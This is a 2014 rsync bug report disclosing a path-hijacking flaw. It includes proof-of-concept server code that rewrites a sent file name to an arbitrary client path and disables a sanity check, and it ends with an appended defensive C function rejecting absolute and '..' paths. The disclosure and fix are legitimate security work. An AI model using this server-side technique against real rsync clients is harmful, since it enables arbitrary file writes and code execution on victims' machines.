[Bug 10936] New: Rsync path hijacking attack vulnerability

samba-bugs at samba.org
Thu Nov 13 23:51:40 MST 2014


https://bugzilla.samba.org/show_bug.cgi?id=10936

            Bug ID: 10936
           Summary: Rsync path hijacking attack vulnerability
           Product: rsync
           Version: 3.1.1
          Hardware: All
                OS: All
            Status: NEW
          Severity: critical
          Priority: P5
         Component: core
          Assignee: wayned at samba.org
          Reporter: gaojianfeng at baidu.com
        QA Contact: rsync-qa at samba.org

Created attachment 10433
  --> https://bugzilla.samba.org/attachment.cgi?id=10433&action=edit
Rsync path hijacking attack vulnerability.pdf (Detailed documentation)

Hi all:
    In the newest version of rsync, Baidu Security Team found a vulnerability which
is similar to the wget FTP issue CVE-2014-4877
(http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4877). When a
client uses the parameter -a to synchronize files from the server side (the default),
for example:
rsync -avzP  127.0.0.1::share   /tmp/share
rsync recursively synchronizes all files. An attacker can hijack the file path by
modifying the code of the server side, which allows remote servers to write to
arbitrary files and consequently execute arbitrary code.

Vulnerability Details:
First I wrote the following files into the shared rsync folder:
[root at pentest rsync]# ls -lh
total 8.0K
-rw-r--r-- 1 root root    2 Oct 31 03:16 1.txt
drwxr-xr-x 2 root root 4.0K Oct 31 05:17 truedir
[root at pentest rsync]# cd  truedir/
[root at pentest truedir]# ls
pwned
[root at pentest truedir]# cat   pwned
rsync test
[root at pentest truedir]#
Next I modified the server's file-sending code; during synchronization, the path of
the file "pwned" can be intercepted and changed to any path.
file: flist.c    line: 394

static void send_file_entry(int f, const char *fname, struct file_struct *file,
#ifdef SUPPORT_LINKS
                const char *symlink_name, int symlink_len,
#endif
                int ndx, int first_ndx)
{
  if(strcmp(fname,"turedir/pwned") == 0){
      fname="/root/pwned.test"; // Arbitrary path
  }
Then verification occurs on the server side and reports "received request to
transfer non-regular file /root/pwned.test 7 [sender]". But as an attacker, the
code of the server side can be arbitrarily controlled, so the following check is
simply commented out.
file: rsync.c   line: 405

/*
    if (iflags & ITEM_TRANSFER) {
        int i = ndx - cur_flist->ndx_start;
        if (i < 0 || !S_ISREG(cur_flist->files[i]->mode)) {
            rprintf(FERROR,
                "received request to transfer non-regular file: %d [%s]\n",
                ndx, who_am_i());
            exit_cleanup(RERR_PROTOCOL);
        }
    }
    */

The file "pwned" will be downloaded into the forged path (/root/pwned.test).

-- 
You are receiving this mail because:
You are the QA Contact for the bug.
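The report shows that the receiving client trusts whatever name the sender puts in the file list. A client-side sanity check of the kind a fix needs, written here as an added example and not rsync's own code (the function name flist_name_is_safe is hypothetical), rejects names that are absolute or contain a ".." component before the receiver opens them, so the forged /root/pwned.test is refused while truedir/pwned is accepted.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical check for a file name received from the remote file list.
 * Returns true only when the name is non-empty, relative, and has no ".."
 * path component, so it cannot by itself escape the destination directory. */
bool flist_name_is_safe(const char *fname)
{
    if (fname == NULL || fname[0] == '\0')
        return false;
    if (fname[0] == '/')            /* sender supplied an absolute path */
        return false;

    /* Walk the name one '/'-separated component at a time. */
    const char *p = fname;
    for (;;) {
        const char *end = strchr(p, '/');
        size_t len = end ? (size_t)(end - p) : strlen(p);
        if (len == 2 && p[0] == '.' && p[1] == '.')
            return false;           /* ".." component: directory traversal */
        if (end == NULL)
            break;
        p = end + 1;
    }
    return true;
}

/* Constructed sample names: the legitimate entry from the report, the
 * forged absolute path, and two traversal variants. */
int main(void)
{
    const char *samples[] = { "truedir/pwned", "/root/pwned.test",
                              "../pwned", "truedir/../../etc/x", "" };
    for (size_t i = 0; i < sizeof samples / sizeof *samples; i++)
        printf("%-22s %s\n", samples[i],
               flist_name_is_safe(samples[i]) ? "accept" : "reject");
    return 0;
}
```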
